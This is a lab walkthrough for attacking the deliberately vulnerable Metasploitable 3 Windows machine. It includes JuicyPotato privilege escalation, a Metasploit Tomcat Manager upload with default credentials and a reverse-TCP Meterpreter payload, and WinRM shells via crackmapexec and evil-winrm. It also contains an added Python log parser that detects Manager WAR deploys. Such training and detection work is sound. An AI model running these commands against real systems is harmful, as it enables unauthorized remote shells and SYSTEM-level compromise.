Metasploitable 3 Windows Walkthrough

# Use vulners script to find known CVEs
nmap --script vulners -sV -p 445,8080,8585,9200 192.168.1.100

If you landed as a non-admin user but have SeImpersonatePrivilege, you can elevate to SYSTEM.

Upload JuicyPotato.exe via Evil-WinRM:

upload JuicyPotato.exe C:\temp\

Then run:

Invoke-Command -ScriptBlock { C:\temp\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami > C:\temp\priv.txt" -t * }

If it worked, C:\temp\priv.txt contains nt authority\system.

This is a classic exploit. Tomcat is running on port 8282.

The Tomcat Manager application is reachable, and its default credentials (tomcat/tomcat, set in the module below) still work. The Manager lets an authenticated user deploy a WAR, so a malicious JSP payload can be uploaded through it.

Using Metasploit for the Tomcat Exploit:

use exploit/multi/http/tomcat_mgr_upload
set RHOSTS <Target_IP>
set RPORT 8282
set HttpUsername tomcat
set HttpPassword tomcat
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST <Your_IP>
run

Result: You should receive a Meterpreter session running as NT AUTHORITY\SYSTEM. You have already won! But for the sake of learning, let's look at the next vector.
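From the defender's side, this vector is loud: every step of it lands in Tomcat's access log. The following is an added example, not part of the original walkthrough, that parses constructed log lines in Tomcat's default AccessLogValve format and flags successful WAR deployments through the Manager together with repeated 401s against it (the signature of a credential guess before the deploy); the path names and sample lines are assumptions for the demo.

```python
import re
from collections import defaultdict

# Constructed sample lines in Tomcat's default AccessLogValve format:
# %h %l %u %t "%r" %s %b  (client IP, ident, auth user, timestamp, request, status, bytes)
SAMPLE_LOG = """\
192.168.56.1 - - [10/Mar/2024:14:21:57 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.1 - - [10/Mar/2024:14:21:58 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.168.56.1 - tomcat [10/Mar/2024:14:22:00 +0000] "GET /manager/html HTTP/1.1" 200 19410
192.168.56.1 - tomcat [10/Mar/2024:14:22:01 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=3F2A HTTP/1.1" 200 18922
192.168.56.1 - - [10/Mar/2024:14:22:02 +0000] "GET /Xk9sPq2/ HTTP/1.1" 200 0
10.0.0.7 - - [10/Mar/2024:14:30:11 +0000] "GET /docs/index.html HTTP/1.1" 200 5312
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)


def audit_manager_access(log_text):
    """Return (deploys, failed_logins).

    deploys: (ip, user, timestamp, path) for every successful PUT/POST to a
             Manager deploy or upload endpoint, i.e. a WAR being installed.
    failed_logins: count of 401 responses per client IP against /manager/,
             which precedes a deploy when the password was guessed.
    """
    deploys = []
    failed = defaultdict(int)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        path, status = m["path"], int(m["status"])
        if not path.startswith("/manager/"):
            continue
        if status == 401:
            failed[m["ip"]] += 1
        elif status == 200 and m["method"] in ("PUT", "POST") and (
            "/deploy" in path or "/upload" in path
        ):
            # strip the query string (CSRF nonce) so the path is stable to alert on
            deploys.append((m["ip"], m["user"], m["ts"], path.split("?")[0]))
    return deploys, dict(failed)


if __name__ == "__main__":
    for d in audit_manager_access(SAMPLE_LOG)[0]:
        print("WAR deployed via Manager:", d)
```

A 200 on a freshly created context path (like the `/Xk9sPq2/` line above) from the same client right after the upload is the payload being triggered; the same parser can be extended to correlate it.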

If you have domain credentials (Metasploitable 3 has vagrant/vagrant and administrator/vagrant), you can run commands over WinRM with crackmapexec:

crackmapexec winrm 192.168.56.103 -u administrator -p vagrant -x "whoami"

Or use evil-winrm for an interactive shell:

evil-winrm -i 192.168.56.103 -u administrator -p vagrant

Now that you are SYSTEM, what do you do?